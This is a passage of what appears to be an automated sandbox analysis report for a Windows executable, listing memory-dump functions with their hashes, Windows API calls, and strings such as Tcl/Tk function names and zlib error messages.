                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction ID: bea6f2979c97292ab5e279b5dbc5d2ad7b6025bd81adf42ae9bfc8ac724a672c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B51B461B0964286FF6A9A6D9C00E7B62A1AF44BF4F148734DE6DC77C5CF3CE4018642
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction ID: 9ee7cf53e83f83ff636c49a0e447475e1a33ff4bcac3591da54af4149936f7ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C119171718A8181DE618B29EC5416A6371BB85BF4F544331EE7D8B7E9CE7CD0518701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction ID: 88a097576592780916cce2bdbbfb4a633a96d504a379eecfbb912931ba418a9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8E0CD60F0C60392FF16DBFA9C6553A11706FD8BB0F044234C81DC22A2EE3C6895C312
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC36
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction ID: 71713c5413e71548ff9e783cc55ef8f4c1438063c4e8d6133f2a6256f75af0f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A219321F1C64242FEA657699C9067B12B29F84BF4F484339EA2EC77C5CE6CE4458302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction ID: ef09d287a09e8cd73fc19644dbf20ae15d5b4352a4f4c756acca0183ea213856
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0541B132B0960187EE359A1DED50A7B73B4EB55BE4F105231DA8EC7691CF2DE402CB52
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                              • Instruction ID: 0039720059a151118b1f507c689274f688197bc56855f4e79e3fe9b4d6c86197
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C21D321B0C65285FE119B2A6D087BA9665FF45BE8F8C4430EF0D9B786DE3DE046D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction ID: 97f1d0c4fecc28903f4903597c344abfd029484504783e5bb07065959d23f5a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F317E31B1864285EB539B598C61BBE2670AF40BF4F420339E96D933D2DF7CA4818722
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                              • Instruction ID: 397e3f1ae1e6ffb949a3a46553bfcaf4141d650b8b21ac4da724afef2049a6b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23217F32B057828EEF6A9F68C848AEE33B0EB44768F444635D62D86AD5DF3CD584C741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: 5288570d1ffbc8e2ef83e37d5cf275736ad5d9772271ffb1c41ff4d437e66771
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75119632B1C64181FE629F599C0197FA2B1AF45BE0F444231EB4CD7A96DFBDD4008702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction ID: 546a1a177f04ca54416a5c650dd3ac28fe9a4316dc461935a5df6a72e6a73d96
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB215072718A8286DFA19F1CD85077A76B0FB84BA8F548234E69DC76D9DF3CD4008B01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: b3f33d435726a7e6b37db82cf8507c0968e1e1daa5d36e65d9fb8158fd0a91c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C018E22B4874141EE06DB5A9D0186AA6A1BF86FF0F488731EE5C97BD6CE3CE0018341
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF62CC80D00,?,?,?,00007FF62CC8236A,?,?,?,?,?,00007FF62CC83B59), ref: 00007FF62CC8D6AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction ID: b3bd5f2276f108c7148e443b174a34106403ac9e25767aa87aac732a18a42dfd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F0FE10F0934B95FE6667A95C51A7A12B06F547F0F094B30DD2EC53DADE2CF4808612
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                              • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction ID: 4736c4785d45458d7ecd6ca510b826146a83199af77a7766b131d2ddab09aa15
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9702B270B0DB0BA1FE269B5DAD245B423B4BF44B79B44A031D41E862A4EF3CB559D313
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                              • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                              • Instruction ID: 88decd72be5a7f46fe74429af4287eed30f21bb7dfc91fc8adaa3edcf3b7fe1f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08B2A072B182928BEB65CF68D8407FD77B1FB543A8F509235DA0D97A84DF38A901CB41
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                              • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                              • Instruction ID: 8ae60b9cd473ee91f08f1894026c8253c6b1e8ae1a9b9d77db61fce0dabcc128
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8652B272B146A68BDB948F19D858A7E3BBDFB44350F015139E64A8B780DF3CD848DB41
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
